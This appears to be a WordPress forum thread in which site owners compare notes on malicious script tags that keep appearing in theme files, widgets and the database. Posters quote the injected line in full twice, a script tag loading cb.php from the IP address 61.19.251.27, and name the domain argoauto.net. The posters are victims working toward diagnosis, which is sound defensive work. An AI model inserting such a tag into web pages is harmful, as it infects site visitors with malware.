This showed up on one of my sites today as well. I found the code in a footer widget. No idea how it got there.
Thank you, I will look there!
Out of curiosity what version of WordPress is your install running? This client is on 3.3.1 and I’m wondering if this is still a vulnerability in the latest version.
Can you elaborate just a little bit on which file you found the script link in? I’m having trouble locating it.
Thanks
Cooper
I got a Google warning because of malicious scripts on my website and indeed in de header.php of the theme file I saw this code:
<script type="text/javascript" src=[ redacted, you don't need to post that here ]"></script>
I am using a Artisteer generated template with the newest version of WordPress 3.4.2 and these plugins:
All in One SEO Pack 1.6.15.2
Google XML Sitemaps 3.2.8
Hyper Cache 2.9.0.3
Jigowatt WordPress Ajax Contact Forms 1.2.3
MailChimp Widget 0.8.12
Newsletters Tribulant 3.9.4
Print Friendly and PDF 3.1.3
Social Media Widget 2.9.4
WP Simple Survey 2.2.9
WP to Twitter 2.4.13
Any similarities?
same here, its in the Adspace Widget! for some reason in the ‘adspace below article’ option there is a link/script to arogoauto.net.
make sure you change your password, someone or a script cracked your password.
I just found that line today in the top my theme’s (Suffusion) index.php. It’s the 2nd time such a script has popped up there in the past 2 months. I’d love to figure out how it’s getting there.
@jzn21, I don’t think we have any plug ins or even wordpress version in common.
Same in my wp. Newest wp – version 3.4.2
In my theme index.php there were these line with js in the top.
Any solution for the future?
Is this some wp bug?
Seems like a hosting issue to me. I’ve contacted GoDaddy about it (via a trouble ticket, since their help line gives only a busy signal, a highly unusual sign that something’s going on).
Argoauto.net should be blacklisted by their servers, I think.
This shows up in my Malware search in Developer tools and a few other sites. I am unable to find ‘argoauto.net’ in any searches of my files or my database. Where could this be hiding. If it is gone from my files, does anyone know how it got there? Any solutions to block this?
Have a similar script that gets added, in the ‘Adspace below Article’ <script type=”text/javascript” src=”http://61.19.251.27/web/cb.php”></script>
This has been happening for about 4 weeks, at the begiining it was the argouto.net script.
I have the latest wordpress and those plugins in common with jzn21
All in One SEO Pack 1.6.15.2
Google XML Sitemaps
MailChimp Widget 0.8.12
WP to Twitter 2.4.13
This is consistent with my infection. Removed the argoauto.net script when it popped up a couple weeks ago, today the
<script type="text/javascript" src="redacted"></script>
popped up. Both times it was the first line of index.php in the theme file.
Same exact thing happened to me…. First argoauto.net and now:
<script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>
This is the third time the site was blocked for malware.
I did not find this in any of my file but in my database. I removed it from there and now my site is back up but has anyone found where this vulnerability might be? I have many plugins on the site and I am not sure where to begin to look.
This site is enormous and I am afraid to do a complete reinstall… Any help would be greatly appreciated.
